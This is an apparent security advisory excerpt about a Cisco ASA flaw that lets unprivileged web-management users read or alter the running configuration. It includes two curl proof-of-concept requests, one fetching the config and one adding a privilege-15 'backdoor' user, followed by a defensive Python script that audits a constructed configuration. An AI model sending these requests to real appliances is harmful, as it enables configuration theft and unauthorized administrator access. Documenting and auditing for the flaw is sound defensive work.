Description
Analysis
When command authorization is not enabled, an authenticated remote unprivileged (level 0 or 1) user can change or download the running configuration as well as upload or replace the appliance firmware. Downgrading appliance firmware to an older version would allow an attacker to leverage known vulnerabilities that have been well researched or have publicly available exploit modules.
A simple proof of concept for downloading the running configuration follows:
curl --basic -u notadmin -p -k http:///admin/system/running-config
The following proof of concept allows an unprivileged user to add a new privileged user to the running configuration:
curl --basic -u notadmin -p -k -X "POST" --data-binary "username fourthuser password backdoor privilege 15" "http:///admin/config"
According to Cisco, “This vulnerability affects Cisco ASA Software that is running on any Cisco product that has web management access enabled.”
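To check whether a given appliance meets the two preconditions described above (web management access enabled, command authorization not enabled), the running configuration can be audited offline. The script below is an added example, not code from the advisory or from Cisco. It assumes that "http server enable" marks web management access, that a line beginning "aaa authorization command" marks command authorization, and that a user without an explicit privilege gets the ASA default of 2. The sample configuration is constructed.

```python
import re

# Constructed sample running-config (not from a real device).
SAMPLE_CONFIG = """\
hostname asa-lab
http server enable
http 192.0.2.0 255.255.255.0 management
username admin password CONSTRUCTEDHASH1 encrypted privilege 15
username notadmin password CONSTRUCTEDHASH2 encrypted privilege 1
username helpdesk password CONSTRUCTEDHASH3 encrypted
username admin attributes
 service-type admin
aaa authentication http console LOCAL
"""

DEFAULT_PRIVILEGE = 2  # assumption: ASA default when "privilege" is omitted
USER_RE = re.compile(r"username\s+(\S+)\s+(?:password|nopassword)\b")
PRIV_RE = re.compile(r"\bprivilege\s+(\d+)\s*$")


def audit(config_text):
    """Report the preconditions the advisory names for this issue."""
    lines = [line.strip() for line in config_text.splitlines()]
    # Web management access: "http server enable", optionally with a port.
    web_mgmt = any(l == "http server enable" or
                   l.startswith("http server enable ") for l in lines)
    # Command authorization: any "aaa authorization command ..." line.
    cmd_authz = any(l.startswith("aaa authorization command ") for l in lines)
    non_admin = {}
    for l in lines:
        user = USER_RE.match(l)
        if not user:
            continue  # skips "username X attributes" and unrelated lines
        priv = PRIV_RE.search(l)
        level = int(priv.group(1)) if priv else DEFAULT_PRIVILEGE
        if level < 15:  # the advisory names levels 0 and 1 specifically
            non_admin[user.group(1)] = level
    return {
        "web_management": web_mgmt,
        "command_authorization": cmd_authz,
        "non_admin_users": non_admin,
        "exposed": web_mgmt and not cmd_authz and bool(non_admin),
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_CONFIG).items():
        print(f"{key}: {value}")
```

The privilege-15 account list is also worth comparing against a known-good baseline, since the second proof of concept above works by adding such a user.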